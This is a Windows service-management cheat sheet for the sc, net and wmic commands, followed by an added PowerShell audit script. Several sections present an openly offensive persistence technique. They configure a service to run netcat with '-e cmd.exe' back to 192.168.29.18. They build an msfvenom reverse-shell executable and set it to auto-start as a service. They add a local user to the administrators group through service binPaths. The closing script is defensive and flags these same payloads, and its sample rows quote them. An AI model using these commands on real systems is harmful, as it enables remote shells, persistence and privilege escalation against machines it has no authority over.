Service Controller Utility Commands

Querying Services

  • Display information about a specified service

sc query
  • Display extended information about a service

sc queryex type= service
  • Display services of type 'service'

sc query type= service
  • Find specific service state

sc query | find "STATE"
  • Find a specific service by name

sc query | find "Server"
  • Query a specific service

sc query <Service_name>

Service Configuration

  • Display the configuration of a service

sc qc <Service_Name>
  • Stop a service

sc stop <Service_Name>
  • Start a service

sc start <Service_name>
  • Pause a Service

sc pause <Service_name>
  • Resume a paused service

sc continue <Service_name>
  • Configure service startup and login accounts

sc config <Service_name>

Creating and Managing Services

  • Create a new Service

sc create nc binPath= "C:\Windows\System32\nc64.exe"
  • Query the configuration of a created service

sc qc nc
  • Query the status of a created service

sc query nc
  • Start the created service

sc start nc
  • Delete a service

sc delete nc
  • Configure a service to run a specific command

sc config nc binPath= "C:\Windows\System32\nc64.exe 192.168.29.18 4444 -e cmd.exe"
  • Create a service to send ICMP packets

sc create pingme binPath= "ping 192.168.29.18"
  • Create a user-creation service

sc create useradd binPath= "net user u1 DevNull@123 /add"
  • Configure a service to add a user to administrators group

sc config useradd binPath= "net localgroup administrators u1 /add"

Exploitation Example

  • Generate a reverse shell executable using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.29.18 LPORT=4455 -f exe > shell.exe
  • Configure a service to execute the shell

sc create nc binPath= "C:\Windows\Temp\shell.exe"
sc config nc start= auto
  • auto - Automatic startup

  • demand - Manual Startup

  • disabled - Disabled

  • Restart the system immediately

shutdown /r /t 0 /f

Service Management using net

  • Start a service using net

net start <Service_name>
  • Stop a service using net

net stop <Service_name>
  • Pause a service using net

net pause <Service_Name>
  • Resume a paused service using net

net continue <Service_name>

Using wmic to manage services

  • List all services with details

wmic service get name,displayname,pathname,startmode
  • List all auto-start services

wmic service get name,displayname,pathname,startmode | findstr /i "auto"
  • List all auto-start services excluding those in C:\Windows

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"
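
For auditing, note that the C:\Windows exclusion above would hide the binPath values used earlier on this page (C:\Windows\Temp\shell.exe, C:\Windows\System32\nc64.exe). The following PowerShell is an added example, not part of the original page: it flags service paths by pattern instead. The function names Get-ServiceBinary and Test-ServicePath are hypothetical and the sample rows are constructed.

```powershell
# Added example (not from the original page). Function names are hypothetical.
function Get-ServiceBinary {
    param([string]$PathName)
    # Quoted path: the executable is the text between the first pair of quotes.
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # Unquoted path: take everything up to the first ".exe".
    if ($PathName -match '^\s*(.+?\.exe)(\s|$)') { return $Matches[1] }
    # No ".exe" at all (for example "ping 192.168.29.18"): use the first token.
    return ($PathName.Trim() -split '\s+')[0]
}

function Test-ServicePath {
    param([Parameter(ValueFromPipeline = $true)]$Service)
    process {
        $exe = Get-ServiceBinary $Service.PathName
        $reasons = @()
        if ($exe -match '\\(Temp|Users)\\') {
            $reasons += 'binary under a Temp or Users directory'
        }
        if ($exe -match '(^|\\)(cmd|powershell|net|net1|ping|nc|nc64)(\.exe)?$') {
            $reasons += 'binPath is a general-purpose command, not a service binary'
        }
        if ($reasons) {
            [pscustomobject]@{
                Name      = $Service.Name
                StartMode = $Service.StartMode
                PathName  = $Service.PathName
                Reasons   = $reasons -join '; '
            }
        }
    }
}

# Constructed sample rows using the fields returned by the wmic query above.
$sample = @(
    [pscustomobject]@{ Name = 'Spooler'; StartMode = 'Auto';   PathName = 'C:\Windows\System32\spoolsv.exe' }
    [pscustomobject]@{ Name = 'nc';      StartMode = 'Auto';   PathName = 'C:\Windows\Temp\shell.exe' }
    [pscustomobject]@{ Name = 'nc2';     StartMode = 'Manual'; PathName = 'C:\Windows\System32\nc64.exe 192.168.29.18 4444 -e cmd.exe' }
    [pscustomobject]@{ Name = 'pingme';  StartMode = 'Manual'; PathName = 'ping 192.168.29.18' }
    [pscustomobject]@{ Name = 'useradd'; StartMode = 'Manual'; PathName = 'net user u1 DevNull@123 /add' }
)
$sample | Test-ServicePath | Format-Table -AutoSize -Wrap

# On a live host, feed it real data instead of the sample:
#   Get-CimInstance -ClassName Win32_Service | Test-ServicePath
```

Only the Spooler row passes unflagged; the other four rows match the patterns this page demonstrates.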
